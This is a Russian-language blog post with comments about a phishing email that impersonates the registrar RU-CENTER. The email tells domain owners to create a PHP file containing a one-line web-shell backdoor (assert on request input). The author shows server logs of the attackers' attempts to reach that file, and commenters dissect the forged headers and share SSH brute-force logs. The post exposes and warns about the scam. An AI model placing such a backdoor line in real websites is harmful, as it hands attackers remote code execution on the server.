November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Navigation

Page Summary

Style Credit

Expand Cut Tags

No cut tags

Пришло письмо, якобы от RU-CENTER

dil: (Default)
[personal profile] dil
Saturday, December 9th, 2017 12:51 pm

Уважаемый администратор домена!

В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл *****.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего сообщения и находиться на сервере до 19 августа 2017 года, 15:00 (UTC+03:00), в противном случае процедура активации будет считаться непройденной.

Уведомляем Вас о том, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

Письмо я прочитал слишком поздно, а то бы и вправду создал этот файл. Естественно, с другим кодом, чтобы записать, какие запросы эти хакеры в него будут посылать, а не позволять им читать и писать файлы у меня на сервере, и выполнять прочие команды.

Сейчас посмотрел в логи, они и вправду пытались в него зайти вплоть до 19 августа, как и обещали:
13.59.87.172 - - [07/Aug/2017:15:04:08 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; ; Linux i686; rv:1.9.2.20) Gecko/20110805"
13.59.87.172 - - [10/Aug/2017:16:36:36 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13"
54.215.228.151 - - [19/Aug/2017:12:13:41 +0100] "POST /*****.php HTTP/1.1" 404 218 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"

А вот где они украли мой адрес – непонятно, nic.ru в whois про меня ничего не показывает, просто Private person.

Оригинал этой записи в личном блоге.

Tags:
Threaded | Top-Level Comments Only

mcjabberwock: (meow)
[personal profile] mcjabberwock
Saturday, December 9th, 2017 09:37 pm (UTC)
Ой, какая прелесть!
Мне вот такого не прислали..
А можно заголовочек того письма?

dil: (Default)
[personal profile] dil
Sunday, December 10th, 2017 11:15 am (UTC)
Received: в почтовый сервер моего адреса..
Received: from relay-out5.shared.masterhost.ru ([90.156.200.39])
	by relay3.shared.masterhost.ru with esmtp 
	envelope from <php-sender-uprstroyrec.ru@undeliverable.masterhost.ru>
	message id 1dcVQ3-0000BW-4M
	for мой@адрес; Tue, 01 Aug 2017 14:32:59 +0300
Received: from cm105.hs.shared.masterhost.ru ([90.156.199.116])
	by relay5.shared.masterhost.ru with esmtp 
	envelope from <php-sender-uprstroyrec.ru@undeliverable.masterhost.ru>
	message id 1dcVQ2-0005Xw-Sx
	for мой@адрес; Tue, 01 Aug 2017 14:32:59 +0300
Received: from u237256 by cm105.hs.shared.masterhost.ru with local (Exim 4.80)
	(envelope-from <php-sender-uprstroyrec.ru@undeliverable.masterhost.ru>)
	id 1dcVPr-0003VH-Ft
	for мой@адрес; Tue, 01 Aug 2017 14:32:47 +0300
To: <мой@адрес>
Subject: =?utf-8?B?0JLQsNC20L3QsNGPINC40L3RhNC+0YDQvNCw0YbQuNGP?=  =?utf-8?B?INC00LvRjyDQstC70LDQtNC10LvRjNGG0LAg0LTQvtC8?=  =?utf-8?B?0LXQvdCwIA==?= ....
X-PHP-Script: uprstroyrec.ru/_dbm/js/codemirror/modulate/cord/highresolution.php for 92.63.91.18, 92.63.91.18, 92.63.91.18
Message-ID: <906A23C95A8EA063BFBAF34662784355@nic.technical>
Reply-To: "RU-CENTER" <no-reply@nic.technical>
From: "RU-CENTER" <no-reply@nic.technical>
Date: Tue, 1 Aug 2017 04:32:47 -0700
Organization: RU-CENTER
MIME-Version: 1.0
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.5931
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157
X-Spam: Yes
reply-to: no-reply - это однозначно фальшивка

dil: (Default)
[personal profile] dil
Sunday, December 10th, 2017 11:17 am (UTC)
А у тебя домены в .ru есть?
У меня три штуки, а прислали только про один.

mcjabberwock: (meow)
[personal profile] mcjabberwock
Sunday, December 10th, 2017 11:23 am (UTC)
Есть два, плюс пара в msk.ru
Ничего не пришло

mcjabberwock: (meow)
[personal profile] mcjabberwock
Sunday, December 10th, 2017 11:33 am (UTC)
Стоило бы в masterhost написать, они вроде вменяемые
Ясен день, что у NIC.RU сервера свои, типа
Received: from relay2o.nic.ru (relay2o.nic.ru [31.177.69.4])

@nic.technical - эх, фантазии не хватило, ламеры!
нарисовали бы no-reply@nic.ru - может, больше бы повелось, опять же - ламеров

Эх, куда катится мир?!

И эти вечные-бесконечные

Dec 10 01:08:58 mail sshd[20379]: Invalid user admin from 119.193.140.200
Dec 10 02:07:08 mail sshd[20518]: Invalid user pi from 78.196.118.157
Dec 10 02:07:08 mail sshd[20520]: Invalid user pi from 78.196.118.157
Dec 10 04:15:31 mail sshd[21130]: Invalid user admin from 125.112.139.210
Dec 10 04:27:50 mail sshd[21157]: Invalid user usuario from 126.117.252.93
Dec 10 04:33:33 mail sshd[21179]: Invalid user admin from 183.159.74.200
Dec 10 05:37:57 mail sshd[21324]: Invalid user service from 119.193.140.150
Dec 10 06:51:52 mail sshd[21589]: Invalid user admin from 218.5.173.199
Dec 10 07:09:25 mail sshd[21690]: Invalid user pi from 67.161.78.37
Dec 10 07:09:25 mail sshd[21692]: Invalid user pi from 67.161.78.37
Dec 10 10:25:40 mail sshd[22716]: Invalid user admin from 14.162.211.112
Dec 10 10:25:46 mail sshd[22718]: Invalid user admin from 196.219.94.117
Dec 10 10:25:50 mail sshd[22720]: Invalid user admin from 95.68.172.155
Threaded | Top-Level Comments Only